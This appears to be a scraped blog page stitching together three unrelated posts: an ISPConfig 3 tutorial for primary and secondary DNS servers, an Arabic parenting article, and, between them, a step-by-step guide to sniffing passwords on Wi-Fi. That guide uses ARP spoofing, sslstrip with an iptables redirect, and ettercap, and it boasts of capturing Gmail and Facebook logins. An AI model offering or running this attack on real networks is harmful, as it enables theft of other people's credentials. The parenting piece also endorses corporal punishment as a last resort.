Monday, July 25, 2011

How To Run Your Own DNS Servers (Primary And Secondary) With ISPConfig 3 (Debian Squeeze)


This tutorial shows how you can run your own DNS servers (primary and secondary) with ISPConfig 3. To do this, you need two servers with two different public IP addresses and with ISPConfig 3 installed. I will use Debian Squeeze for both DNS servers here to demonstrate the base system setup process and ISPConfig 3 installation, but once you have ISPConfig 3 installed on your servers, the configuration inside ISPConfig 3 is identical, no matter what distribution you use.
I do not issue any guarantee that this will work for you!

1 Preliminary Note

Our current situation is as follows: we have
  • ISPConfig server #1 (server1.example.com): IP address 1.2.3.4; this one will be our primary name server.
  • ISPConfig server #2 (server2.example.com): IP address 1.2.3.5; this one will be our secondary name server.
server1.example.com will be a full ISPConfig 3 installation. It will be the master ISPConfig 3 server (which runs the ISPConfig control panel interface) and act as an email, web, DNS, and MySQL server (this is the most common setup - one server that has all the services). server2.example.com will be a slave ISPConfig 3 server (no ISPConfig control panel interface) and will act only as the secondary DNS server. Of course, you can split up services between your servers as you like - the tutorial Installing A Multiserver Setup With Dedicated Web, Email, DNS And MySQL Database Servers On Debian 5.0 With ISPConfig 3 should give you the idea.
DNS A records for server1.example.com and server2.example.com must already exist (you can create them through your domain registrar's control panel). We will use server1.example.com and server2.example.com as the name servers for our zones later on; if you prefer something like ns1.example.com and ns2.example.com instead of server1.example.com and server2.example.com, you can use these, but make sure that there are DNS A records for ns1.example.com and ns2.example.com as well (that point to the same IPs as server1.example.com or server2.example.com).
I will show how to create a zone for the domain mydomain.com - this domain must already be registered through a domain registrar. After I have created the mydomain.com zone and verified that both server1.example.com and server2.example.com serve all mydomain.com records correctly, I will show how to make server1.example.com and server2.example.com the authoritative name servers for mydomain.com (see chapter 8).
More details about how to create DNS zones/records can be found in chapters 4.8 and 5.12 of the ISPConfig 3 Manual.
 

2 Setting Up server1.example.com (Primary DNS)

server1.example.com:
Please set up server1.example.com as shown in The Perfect Server - Debian Squeeze (Debian 6.0) With BIND & Courier [ISPConfig 3], but stop before the ISPConfig 3 installation.
To allow the other MySQL instances to connect to the MySQL database on this node during ISPConfig 3 installation, we have to add MySQL root user records in the master database for every slave server hostname and IP address. Log into MySQL:
mysql -u root -p
On the MySQL shell, run the following queries:
CREATE USER 'root'@'1.2.3.5' IDENTIFIED BY 'yourrootsqlpassword';
GRANT ALL PRIVILEGES ON * . * TO 'root'@'1.2.3.5' IDENTIFIED BY 'yourrootsqlpassword' WITH GRANT OPTION MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0 ;
CREATE USER 'root'@'server2.example.com' IDENTIFIED BY 'yourrootsqlpassword';
GRANT ALL PRIVILEGES ON * . * TO 'root'@'server2.example.com' IDENTIFIED BY 'yourrootsqlpassword' WITH GRANT OPTION MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0 MAX_UPDATES_PER_HOUR 0 MAX_USER_CONNECTIONS 0 ;
FLUSH PRIVILEGES;
quit;
Make sure you replace 1.2.3.5 with the IP address and server2.example.com with the hostname of your secondary DNS server!
Now we can install ISPConfig 3 on server1.example.com as follows:
cd /tmp
wget http://www.ispconfig.org/downloads/ISPConfig-3-stable.tar.gz
tar xfz ISPConfig-3-stable.tar.gz
cd ispconfig3_install/install/
php -q install.php
root@server1:/tmp/ispconfig3_install/install# php -q install.php


--------------------------------------------------------------------------------
 _____ ___________   _____              __ _         ____
|_   _/  ___| ___ \ /  __ \            / _(_)       /__  \
  | | \ `--.| |_/ / | /  \/ ___  _ __ | |_ _  __ _    _/ /
  | |  `--. \  __/  | |    / _ \| '_ \|  _| |/ _` |  |_ |
 _| |_/\__/ / |     | \__/\ (_) | | | | | | | (_| | ___\ \
 \___/\____/\_|      \____/\___/|_| |_|_| |_|\__, | \____/
                                              __/ |
                                             |___/
--------------------------------------------------------------------------------


>> Initial configuration

Operating System: Debian 6.0 (Squeeze/Sid) or compatible

    Following will be a few questions for primary configuration so be careful.
    Default values are in [brackets] and can be accepted with .
    Tap in "quit" (without the quotes) to stop the installer.


Select language (en,de) [en]:
 <-- ENTER

Installation mode (standard,expert) [standard]: <-- expert

Full qualified hostname (FQDN) of the server, eg server1.domain.tld  [server1.example.com]: <-- ENTER

MySQL server hostname [localhost]: <-- ENTER

MySQL root username [root]: <-- ENTER

MySQL root password []: <-- yourrootsqlpassword

MySQL database to create [dbispconfig]: <-- ENTER

MySQL charset [utf8]: <-- ENTER

Shall this server join an existing ISPConfig multiserver setup (y,n) [n]: <-- ENTER

Adding ISPConfig server record to database.

Configure Mail (y,n) [y]:
 <-- ENTER

Configuring Postfix
Generating a 2048 bit RSA private key
............................................................................................+++
..........................+++
writing new private key to 'smtpd.key'
-----
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
 <-- ENTER
State or Province Name (full name) [Some-State]: <-- ENTER
Locality Name (eg, city) []: <-- ENTER
Organization Name (eg, company) [Internet Widgits Pty Ltd]: <-- ENTER
Organizational Unit Name (eg, section) []: <-- ENTER
Common Name (eg, YOUR name) []: <-- ENTER
Email Address []: <-- ENTER
Configuring SASL
Configuring PAM
Configuring Courier
Configuring Spamassassin
Configuring Amavisd
Configuring Getmail
Stopping Postfix Mail Transport Agent: postfix.
Starting Postfix Mail Transport Agent: postfix.
Stopping SASL Authentication Daemon: saslauthd.
Starting SASL Authentication Daemon: saslauthd.
Stopping amavisd: amavisd-new.
Starting amavisd: amavisd-new.
Stopping ClamAV daemon: clamd.
Starting ClamAV daemon: clamd Bytecode: Security mode set to "TrustSigned".
.
Stopping Courier authentication services: authdaemond.
Starting Courier authentication services: authdaemond.
Stopping Courier IMAP server: imapd.
Starting Courier IMAP server: imapd.
Stopping Courier IMAP-SSL server: imapd-ssl.
Starting Courier IMAP-SSL server: imapd-ssl.
Stopping Courier POP3 server: pop3d.
Starting Courier POP3 server: pop3d.
Stopping Courier POP3-SSL server: pop3d-ssl.
Starting Courier POP3-SSL server: pop3d-ssl.
Configure Jailkit (y,n) [y]:
 <-- ENTER

Configuring Jailkit
Configure FTP Server (y,n) [y]:
 <-- ENTER

Configuring Pureftpd
Restarting ftp server: Running: /usr/sbin/pure-ftpd-mysql-virtualchroot -l mysql:/etc/pure-ftpd/db/mysql.conf -l pam -Y 1 -8 UTF-8 -H -D -b -O clf:/var/log/pure-ftpd/transfer.log -E -u 1000 -A -B
Configure DNS Server (y,n) [y]:
 <-- ENTER

Configuring BIND

Hint: If this server shall run the ISPConfig interface, select 'y' in the 'Configure Apache Server' option.

Configure Apache Server (y,n) [y]:
 <-- ENTER

Configuring Apache
Configuring Vlogger
Configuring Apps vhost
Configure Firewall Server (y,n) [y]:
 <-- ENTER

Configuring Firewall
Install ISPConfig Web Interface (y,n) [y]:
 <-- ENTER

Installing ISPConfig
ISPConfig Port [8080]:
 <-- ENTER

Enable SSL for the ISPConfig web interface (y,n) [y]: <-- ENTER

Generating RSA private key, 4096 bit long modulus
.................................................................................................................++
..................................++
e is 65537 (0x10001)
You are about to be asked to enter information that will be incorporated
into your certificate request.
What you are about to enter is what is called a Distinguished Name or a DN.
There are quite a few fields but you can leave some blank
For some fields there will be a default value,
If you enter '.', the field will be left blank.
-----
Country Name (2 letter code) [AU]:
 <-- ENTER
State or Province Name (full name) [Some-State]: <-- ENTER
Locality Name (eg, city) []: <-- ENTER
Organization Name (eg, company) [Internet Widgits Pty Ltd]: <-- ENTER
Organizational Unit Name (eg, section) []: <-- ENTER
Common Name (eg, YOUR name) []: <-- ENTER
Email Address []: <-- ENTER

Please enter the following 'extra' attributes
to be sent with your certificate request
A challenge password []:
 <-- ENTER
An optional company name []: <-- ENTER
writing RSA key
Configuring DBServer
Installing ISPConfig crontab
no crontab for root
no crontab for getmail
Restarting web server: apache2 ... waiting .
Installation completed.
root@server1:/tmp/ispconfig3_install/install#

If you have chosen to enable SSL for the ISPConfig web interface, you can reach the ISPConfig web interface at https://server1.example.com:8080, otherwise at http://server1.example.com:8080.


3 Setting Up server2.example.com (Secondary DNS)

 
server2.example.com:
server2.example.com can be set up according to chapter 6 from the tutorial Installing A Multiserver Setup With Dedicated Web, Email, DNS And MySQL Database Servers On Debian 5.0 With ISPConfig 3. I will repeat these steps here:
apt-get -y install ntp ntpdate
apt-get -y install mysql-client mysql-server
New password for the MySQL "root" user: <-- yourrootsqlpassword
Repeat password for the MySQL "root" user: <-- yourrootsqlpassword
apt-get -y install php5-cli php5-mysql php5-mcrypt mcrypt
apt-get -y install bind9 dnsutils
ISPConfig 3 can now be installed as follows:
cd /tmp
wget http://www.ispconfig.org/downloads/ISPConfig-3-stable.tar.gz
tar xfz ISPConfig-3-stable.tar.gz
cd ispconfig3_install/install/
php -q install.php
root@server2:/tmp/ispconfig3_install/install# php -q install.php


--------------------------------------------------------------------------------
 _____ ___________   _____              __ _         ____
|_   _/  ___| ___ \ /  __ \            / _(_)       /__  \
  | | \ `--.| |_/ / | /  \/ ___  _ __ | |_ _  __ _    _/ /
  | |  `--. \  __/  | |    / _ \| '_ \|  _| |/ _` |  |_ |
 _| |_/\__/ / |     | \__/\ (_) | | | | | | | (_| | ___\ \
 \___/\____/\_|      \____/\___/|_| |_|_| |_|\__, | \____/
                                              __/ |
                                             |___/
--------------------------------------------------------------------------------


>> Initial configuration

Operating System: Debian 6.0 (Squeeze/Sid) or compatible

    Following will be a few questions for primary configuration so be careful.
    Default values are in [brackets] and can be accepted with .
    Tap in "quit" (without the quotes) to stop the installer.


Select language (en,de) [en]:
 <-- ENTER

Installation mode (standard,expert) [standard]: <-- expert

Full qualified hostname (FQDN) of the server, eg server1.domain.tld  [server2.example.com]: <-- ENTER

MySQL server hostname [localhost]: <-- ENTER

MySQL root username [root]: <-- ENTER

MySQL root password []: <-- yourrootsqlpassword

MySQL database to create [dbispconfig]: <-- ENTER

MySQL charset [utf8]: <-- ENTER

Shall this server join an existing ISPConfig multiserver setup (y,n) [n]: <-- y

MySQL master server hostname []: <-- server1.example.com

MySQL master server root username [root]: <-- ENTER

MySQL master server root password []: <-- yourrootsqlpassword_on_server1.example.com

MySQL master server database name [dbispconfig]: <-- name_of_ispconfig_database_on_server1.example.com

Adding ISPConfig server record to database.

Configure Mail (y,n) [y]:
 <-- n

Configure Jailkit (y,n) [y]: <-- n

Configure FTP Server (y,n) [y]: <-- n

Configure DNS Server (y,n) [y]: <-- ENTER

Configuring BIND

Hint: If this server shall run the ISPConfig interface, select 'y' in the 'Configure Apache Server' option.

Configure Apache Server (y,n) [y]:
 <-- n

Configure Firewall Server (y,n) [y]: <-- ENTER

Configuring Firewall
Install ISPConfig Web Interface (y,n) [y]:
 <-- n

Configuring DBServer
Installing ISPConfig crontab
no crontab for root
Installation completed.
root@server2:/tmp/ispconfig3_install/install#


4 Configuring server2.example.com To Be A Mirror Of server1.example.com

Now open the ISPConfig 3 control panel (http(s)://server1.example.com:8080) and go to System > Server Services. Select server2.example.com:


Make sure that the DNS-Server checkbox is checked and select server1.example.com in the Is mirror of Server selectbox and click on Save:



5 Creating A DNS Zone

To create a DNS zone, it is recommended to use the DNS Wizard (DNS > DNS Wizard > Add DNS Zone or click on the Add new DNS Zone with Wizard button) which will automatically create a set of common DNS records for your domain (like www, mail, ns records, etc.):


This will bring you to the wizard to create a new DNS zone. The form has the following fields:
  • Template: This refers to the templates that exist under DNS > DNS Wizard > Templates. These templates define what records will be created by default if you use the DNS Wizard. Let's assume we create a zone for the domain mydomain.com - the Default template will create A records for mydomain.com, www.mydomain.com, and mail.mydomain.com, two NS (nameserver) records, plus an MX (mail exchanger) record for mydomain.com that points to mail.mydomain.com.
  • Server: Select server1.example.com here.
  • Client: Here you select the client that owns the new DNS zone.
  • Domain: Fill in the domain for which you want to create the zone, e.g. mydomain.com - please note that you don't need a dot at the end, i.e., mydomain.com. would work as well, but example.com (without the trailing dot) is sufficient.
  • IP Address: Fill in the IP address that mydomain.com should point to - please note that www.mydomain.com and mail.mydomain.com will also point to that IP address (you can change that later on under DNS > DNS > Zones).
  • NS 1: Specify the hostname of the primary nameserver for the domain, server1.example.com. Again, no trailing dot is needed. The server you specify here must point or be identical to the server that you selected in the Server field.
  • NS 2: Specify the hostname of the secondary nameserver for the domain, server2.example.com. Again, no trailing dot is needed.
  • Email: Specify the email address of the zone administrator, e.g. zonemaster@example.com.
Click on Create DNS Record to create the zone:


Afterwards you can find the new zone in the list under DNS > DNS > Zones:


From the list view, it is possible to delete the DNS zone.
If you edit the zone and go to the Records tab, you will see the records that have automatically been created by the DNS Wizard (the Default template will create A records for mydomain.com, www.mydomain.com, and mail.mydomain.com, two NS (nameserver) records, plus an MX (mail exchanger) record for mydomain.com that points to mail.mydomain.com):


On the Records tab, you can edit or delete existing records and add further ones.

6 Testing

 
Now let's test if the zone and its records have been created on both server1.example.com and server2.example.com, and if they are served correctly. We can use the dig tool for it. You can run the following commands on any server (server1.example.com, server2.example.com, or any other server):
dig @server1.example.com any mydomain.com
This command asks server1.example.com to serve all records that it has for mydomain.com:
root@server1:~# dig @server1.example.com any mydomain.com

; <<>> DiG 9.7.3 <<>> @server1.example.com any mydomain.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 45584
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;mydomain.com.                  IN      ANY

;; ANSWER SECTION:
mydomain.com.           86400   IN      A       78.46.230.214
mydomain.com.           86400   IN      MX      10 mail.mydomain.com.
mydomain.com.           86400   IN      NS      server1.example.com.
mydomain.com.           86400   IN      NS      server2.example.com.
mydomain.com.           86400   IN      SOA     server1.example.com. zonemaster.example.com. 2011071901 28800 7200 604800 86400

;; ADDITIONAL SECTION:
mail.mydomain.com.      86400   IN      A       78.46.230.214

;; Query time: 0 msec
;; SERVER: 1.2.3.4#53(1.2.3.4)
;; WHEN: Tue Jul 19 14:09:38 2011
;; MSG SIZE  rcvd: 182

root@server1:~#
If we check server2.example.com, it should return the same records:
dig @server2.example.com any mydomain.com
root@server1:~# dig @server2.example.com any mydomain.com

; <<>> DiG 9.7.3 <<>> @server2.example.com any mydomain.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5183
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 5, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;mydomain.com.                  IN      ANY

;; ANSWER SECTION:
mydomain.com.           86400   IN      A       78.46.230.214
mydomain.com.           86400   IN      MX      10 mail.mydomain.com.
mydomain.com.           86400   IN      NS      server2.example.com.
mydomain.com.           86400   IN      NS      server1.example.com.
mydomain.com.           86400   IN      SOA     server1.example.com. zonemaster.example.com. 2011071901 28800 7200 604800 86400

;; ADDITIONAL SECTION:
mail.mydomain.com.      86400   IN      A       78.46.230.214

;; Query time: 0 msec
;; SERVER: 1.2.3.5#53(1.2.3.5)
;; WHEN: Tue Jul 19 14:10:07 2011
;; MSG SIZE  rcvd: 182

root@server1:~#
You can do the same for www.mydomain.com and mail.mydomain.com and any other hostname you have created, e.g.:
dig @server1.example.com any www.mydomain.com
dig @server2.example.com any www.mydomain.com
dig @server1.example.com any mail.mydomain.com
dig @server2.example.com any mail.mydomain.com
This means our primary/secondary DNS setup is working as expected!

7 Creating Further Records

Let's create an SPF record for demonstration purposes. An SPF record is a TXT record, so we click on the TXT button on the Records tab of the mydomain.com zone.
The form contains the following fields:
  • Hostname: The name that this record describes. This field can contain an FQDN or just a hostname. If you specify an FQDN, the name must end with a dot; if you specify just a hostname, it must not end with a dot. Fill in mydomain.com. here (if you forget the dot at the end, the hostname would translate to mydomain.com.mydomain.com.).
  • Text: You can use the SPF wizard at http://old.openspf.org/ to find out what to fill in here (e.g. v=spf1 a mx ptr -all).
  • TTL: The time interval (in seconds) that this record may be cached before the source of the information should again be consulted. Zero values are interpreted to mean that the record can only be used for the transaction in progress, and should not be cached.
  • Active: This defines whether this TXT record is active or not.


Wait a few minutes, and then test if the record has been created on both server1.example.com and server2.example.com:
dig @server1.example.com any mydomain.com
root@server1:~# dig @server1.example.com any mydomain.com

; <<>> DiG 9.7.3 <<>> @server1.example.com any mydomain.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 23141
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;mydomain.com.                  IN      ANY

;; ANSWER SECTION:
mydomain.com.           86400   IN      A       78.46.230.214
mydomain.com.           86400   IN      MX      10 mail.mydomain.com.
mydomain.com.           86400   IN      NS      server2.example.com.
mydomain.com.           86400   IN      NS      server1.example.com.
mydomain.com.           86400   IN      TXT     "v=spf1 a mx ptr -all"
mydomain.com.           86400   IN      SOA     server1.example.com. zonemaster.example.com. 2011071903 28800 7200 604800 86400

;; ADDITIONAL SECTION:
mail.mydomain.com.      86400   IN      A       78.46.230.214

;; Query time: 0 msec
;; SERVER: 1.2.3.4#53(1.2.3.4)
;; WHEN: Tue Jul 19 14:23:19 2011
;; MSG SIZE  rcvd: 215

root@server1:~#
dig @server2.example.com any mydomain.com
root@server1:~# dig @server2.example.com any mydomain.com

; <<>> DiG 9.7.3 <<>> @server2.example.com any mydomain.com
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13876
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 6, AUTHORITY: 0, ADDITIONAL: 1

;; QUESTION SECTION:
;mydomain.com.                  IN      ANY

;; ANSWER SECTION:
mydomain.com.           86400   IN      A       78.46.230.214
mydomain.com.           86400   IN      MX      10 mail.mydomain.com.
mydomain.com.           86400   IN      NS      server1.example.com.
mydomain.com.           86400   IN      NS      server2.example.com.
mydomain.com.           86400   IN      TXT     "v=spf1 a mx ptr -all"
mydomain.com.           86400   IN      SOA     server1.example.com. zonemaster.example.com. 2011071903 28800 7200 604800 86400

;; ADDITIONAL SECTION:
mail.mydomain.com.      86400   IN      A       78.46.230.214

;; Query time: 1 msec
;; SERVER: 1.2.3.5#53(1.2.3.5)
;; WHEN: Tue Jul 19 14:23:36 2011
;; MSG SIZE  rcvd: 215

root@server1:~#
More details about how to create DNS zones/records can be found in chapters 4.8 and 5.12 of the ISPConfig 3 Manual.

8 Setting server1.example.com And server2.example.com As The Authoritative Name Servers For mydomain.com

Now that everything is working as expected, we want server1.example.com and server2.example.com to be the "official" (=authoritative) name servers for mydomain.com. When you register a domain at your domain registrar, it automatically uses DNS servers of your domain registrar (unless you specify your own name servers) which means if other hosts try to resolve your domain, the DNS servers of your domain registrar will be queried instead of your ISPConfig DNS servers.
To change that, go to your domain registrar's control panel, select your domain, and set your ISPConfig DNS servers as the authoritative name servers for the domain (this is a screenshot from the ResellerClub control panel; other domain registrars have similar control panels):


Please note that you should do this only after you have created the appropriate DNS records on your ISPConfig servers because some registries will complain if they do not find records for the domain on the new authoritative name servers.
If you register a new domain and want to use your ISPConfig servers as the authoritative DNS servers for the domain, you should first create the zone for the domain on the ISPConfig servers and then, while you register the domain, specify the ISPConfig servers as the authoritative name servers. That way your new domain uses the ISPConfig servers from the start on.

9 Links



Sniffing Passwords Over a Wifi Connection [Linux]

Now here's where some fun stuff starts!
I hope many of you have followed my installing Backtrack 5 guide and read up on what ARP is as well as basic Linux commands so you can follow along easily; if not, go read those now!

What you'll need for this tutorial:

If you don't have any of these, follow the links and set up your system before continuing.

Okay, so what we're doing today is using a few programs to sniff passwords over a network and redirect secure HTTPS connections to non-secure HTTP connections to help us get even more passwords.
I've successfully gotten passwords and user names from Gmail, Facebook, Ureddit, Reddit, and Youtube; but all sites should work.

Be warned, this is a beta post so it will be quite simple and unexplained, so it might be hard to understand for the newer Netsec and Linux users. I'll try to make it as easy to understand as possible in the future.

Lets begin:
  • First, we need to figure out the IP address of the user we want to sniff, and the gateway IP (usually 192.168.0.1 or 192.168.1.1 depending on the network)
    • You should have SOME experience with finding users on a network, but if you don't, you can use a program that comes on Backtrack 5 called "Kismet" to identify users, or copy and paste a hand-written script that I created:

      #!/bin/sh

      echo Computers connected to your network: for dom in {0..1};do #for loop for the domain
      for ip in {0..1};do #for loop for the inner IP

      ping -c 1 192.168.$dom.$ip >>ips.tmp & #pings each IP in range and places them in "ips.tmp"

      done
       #finishes first for loop
      done
       #finishes second for loop
      cat ips.tmp |grep "bytes from" |cut -d" " -f4 |cut -d: -f1 >>ips2.tmp #places specific pinged information into "ips2.tmp"

      cat ips2.tmp #outputs that information

      rm ips.tmp #cleans up temp files

      rm ips2.tmp  #cleans up temp files


      Copy this into a file called "pingscan.sh" and run the command "chmod 775 pingscan.sh"
      Then you can run it with the command "./pingscan.sh" and it should output all connected IPs. The first one (lowest number at the end, such as 192.168.0.1) is the gateway, so remember what number that is.
      You can figure out what yours is by doing our good old friend "ifconfig" and looking at your IP address. You can then figure out which ones are other computers and choose which one you wish to directly sniff.
       This is a simple script that I wrote to ping nodes in your network and you can further add more to it by nmapping said nodes. I will write a post soon about this script and we will add more cool and interesting features to it to suit our needs. 
  • What we have to do is flip our computer into "forwarding" mode which allows us to forward packets along to other computers. Issue the command: "echo 1 > /proc/sys/net/ipv4/ip_forward" which places "1" (true or allow in computer language) into the file "ip_forward" with the ">" operator.

  • Next, we have to set up our "iptables" to redirect HTTP (normal) traffic to our program sslstrip.
     Issue the command "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 666"

     I'm using the port 666 because it's easy to remember, but you can use any port that isn't already being used. You probably already know that port 80 is for HTTP traffic, so you can understand why the "destination port" is that. I'll explain the rest later, so don't worry if it doesn't make sense, just check back later!

  • Now we have to run SSLStrip to strip any HTTPS connections and redirect them to HTTP (unsecure) connections. The name SSLStrip is quite perfect, eh?

     To start SSLStrip on my computer, I have to navigate to the SSLStrip folder with the command "cd /pentest/web/sslstrip" first, then issue the command "python sslstrip.py -l 666" to run the program.
    This runs the python script file that starts the program. Python is a scripting language like Perl or Ruby and we will learn about it more in the future. If you're interested in Netsec and want to learn a programming language on your own, definitely check out Python and Perl to start.

    Don't close this terminal.

  • We have to ARP spoof or ARP poison our target computer. We learned about ARP here, and if you haven't read it already, go do so before continuing.
    Open a new terminal now for our ARP spoofing, and run the command:
    "arpspoof -i [your interface] -t [target computer ip address such as 192.168.0.111] [gateway ip address such as 192.168.0.1]

     When I'm arp-spoofing my computer from my laptop, my command is "arpspoof -i wlan0 -t 192.168.0.111 192.168.0.1"

    If you want to arp-spoof the ENTIRE network, issue the command "arpspoof -i [interface] [gateway IP].
    Thanks to Volvox for the above hint, but watch out, because if your computer cant handle all the redirecting the network requires, it will DoS (denial of service) the network.

    Don't close this terminal.

  •  Now open another terminal and lets start Ettercap! We will be using it in text mode today because I personally like it better (it feels less script-kiddie like and easier to navigate/issue commands).

    Run the command "ettercap -m [any_file_name.txt] -Tq -i [interface]" and a text interface will come up telling you a bunch of information (I'll post what mine looks like soon).

    I forgot to mention, to enable on the Ettercap terminal interface, you have to push the space-bar to show the packets coming in... do this and then if there's any navigation on the target computer, you should see the packets start appearing rapidly across your screen.
    Hopefully you're doing this legally on your own network so you can test this out... Open up a browser in your target computer and go to mail.google.com and try to log in. It should redirect you to the HTTP version (but to a normal person, this wont be noticable). Log in with your credentials and you should see something pop up on your Ettercap that looks like a packet from gmail. If it's scrolling too fast (which happens), then don't worry, I'll show you how to open up your file.

  • Open a new terminal while Ettercap is running (don't close it!) and issue the command "cat [your_file_name.txt]"
     Now you can see all the information that was printed at first, and at the bottom there should be some sniffed data if all went well (I'll post a screen-shot later).
    Lets clean this up a bit. Issue the command "cat [your_file_name.txt] |grep USER |cut -d" " -f3-12"
    The quotation marks after the d should be normal, but of course the ones surrounding the entire command are not.
    You should see your data cleaned up quite a bit. I'll run through what that command did later, but I hope you understand some of this for now.
Again, this is a first beta post that I just wanted to get out; I'll be updating it frequently with more information and work-arounds so don't worry if it's not working right away! Post below if you have any issues so I can add it in, too! 

Thursday, July 21, 2011

طفلك المشاكس.. خطوات للتعامل





كتبت- غادة الترساوي:

كثيرا ما يتساءل الوالدان عن الطريقة المثلى التي تمكنهما من التعامل مع طفلهما المشاكس ومساعدته على تجنب السلوك غير المقبول الذي يصدر عنه، ولعل أكثر الطرق شيوعاً هو اللجوء للعقاب البدني أو النفسي والذي ثبت فشله في إحداث التغيير المطلوب في سلوك الطفل ..
ولكن وقبل أن نتحدث عن الوسائل المثلى علينا أولا أن ننبه الوالدين أن المشاكسة ليست طفرة نوعية في سجلات أطفالهم، بل هي ظاهرة طبيعية لنتائج التربية غير الموجهة وعدم معرفة تطور الطفل العقلي، ونلفت إلى أن الطفل المشاكس يملك إدراكا غير الذي يملكه الطفل الهادئ، ونسبة الذكاء تتفاوت بينهما علما بأن الأرضية صحيحة عند الاثنين.. وإن كان إدراكهما سليما وصحيحا إلا أن الطفل المشاكس يتجاوز أحيانا مرحلته العمرية بنسب طفيفة فيبدو ذكيا جدا .
لذا فإن استخدام الضرب مع الطفل المشاكس في بعض الأسر يظهر عجزها عن الحلول المناسبة، لأنهم يجدون الوسيلة الأسرع لحل الإشكال، وإن كان هذا السلوك مقبولا أو نجد له مبررا عند الأسر البسيطة التي لا تملك الوعي الكافي فإن الغريب أن هذا ما يحدث أيضا في الأسر التي تملك مؤهلات ثقافية واجتماعية جيدة ..
روشتة للتغيير
ولكي تعيد توجيه هذه الطاقة الخلاقة في طفلك المشاكس بشكل سليم لتحويل المشاكسة إلى منهج ارتقاء وتعلم وتطوير.. ينصحك د. محمد على كامل (أستاذ علم النفس التربوي بكلية التربية جامعة طنطا) باتباع بعض الخطوات:
1- دع طفلك يشعر بأنك تلاحظ سلوكه ( بالنظر والاقتراب واللمس والإشارة)، فشعور الطفل بمتابعة الراشدين له يجعله يراقب سلوكه فلا يتمادى في الإصرار على السلوك المرفوض وإذا ما شعر بغفلة والديه أو معلميه يستمر في نفس السلوك.
2- تغاضى عن الأخطاء الصغيرة التي تصدر من ابنك للمرة الأولى، والتي يهدف من ورائها إلى إثارة انتباه أبويه والحصول على المتعة في سماع تعليقات الكبار أو استثمار القدرة على إثارة غضبهم .
3- لا تتجاهل الخطأ الكبير الذي لا يمكن السكوت عنه حتى إن وقع منه للمرة الأولى.
4- علم طفلك اللعب وادفعه إلى ممارسته بشكل مدروس، فاللعب بالإضافة إلى أنه إحدى آليات التعبير فمن خلاله يتم أيضا معالجة الأخطاء السلوكية.
5- اعلم أن الطفل المشاكس يستمتع بمشاهدة أخيه وهو يتعرض للعقاب ويقهقه ضاحكاً مثيراً بذلك شعور الكراهية والغيظ في نفس أخيه..لذلك لا تشجع طفلك عندما يخبرك عما ارتكبه أخوه من أخطاء بمعاقبة الأخ المخطئ، لأنك بذلك تكون قد عززت سلوك الغيبة أو النميمة لديه، وبيّن له أن هذا السلوك يسمى نميمة وهو أمر منهى عنه في ديننا الحنيف .
6- قد لا تؤثر تلك الإجراءات في إحداث التغيير المطلوب خاصة في حالة السلوك الحاد الذي يحدث نتيجة غضب الطفل أو نتيجة لاستمتاعه بهذا السلوك، لذا لابد من أن يؤمر بالامتناع عنه مع تبيان ضرره على الآخرين .
7- حذره من عاقبة عمله إذا لم يكف الإجراء السابق وعاد الطفل إلى ارتكاب السلوك نفسه، ونبهه بأن استمراره في ارتكاب نفس العمل ستكون عاقبته وخيمة غير سارة.
ضوابط العقاب
هذه الأساليب تجد صدى طيباً في حالات عدة ويحسن اللجوء إليها قبل الإسراع بعقاب الطفل الذي لم يستجب من أول تنبيه ..ولكن إذا استمرت مشاكسات ابنك ولم يستجب لنصحك لا مناص من عقابه على أن تختار له العقاب المناسب الذي يبتعد عن العقاب البدني.
ومن أمثلة تلك العقوبات :
1- حرمان الطفل من أحد الامتيازات إذا استمر في نفس السلوك .
2- أن يقوم بإصلاح ما أفسده قدر الإمكان، مثلاً أن يقوم الطفل بتنظيف المكان أو الاتيان ببديل من مصروفه الشخصي .
3- عزل الطفل في غرفة بمفرده مدة محدودة إذا كان يمارس سلوكاً عدوانياً مؤذياً لغيره مثل ضرب الآخرين أو الرفس أو الدفع أو الخدش أو التهديد والسب، فعزل الطفل في غرفته لفترة محدودة من الزمن له نتيجة فعالة .
4- عبّر عن عدم رضاك عن سلوك طفلك غير المقبول سواء بالكلام أو بالإيماءات المختلفة كتعبير الوجه، على أن يكون التوبيخ موجهاً إلى سلوك الطفل وليس لشخصه .
نأتي إلى آخر الحلول وهي العقوبة البدنية كآخر الدواء.. فحينما لا يقبل الطفل العودة عن سلوكه المرفوض فلا مناص حينئذٍ من استخدام العقوبة لتقويم سلوكه ..مع ضرورة اتباع الضوابط التالية:
1- أن يكون العقاب مناسبا مع الذنب .
2- أن يوقع العقاب بعد اقتراف الذنب، أما تأجيله لفترة طويلة أو قصيرة فيفقده المعنى والفائدة.
3- لا يجوز أن يوقع العقاب إلا بعد أن ينتبه الطفل إلى خطئه ويعطي فرصة كي يقلع عنه .
4- قلل العقاب ما استطعت واستعمل العقوبة بالتدريج بدءًا من الأضعف فالأشد .
5- ابتعد عن الانفعال حين تعاقبه ولا تجعلها تمتد فتتحول إلى إهانة له أو إهدار لكرامته .
6- وأخيراً وأهم شيء ألا توقع العقوبة على الطفل أمام أصدقائه أو إخوته .
موضوعات ذات صلة:
كيف تتعامل مع طفلك المخطئ

اقرأ المقال الأصلي علي بوابة الوفد الاليكترونية طفلك المشاكس.. خطوات للتعامل

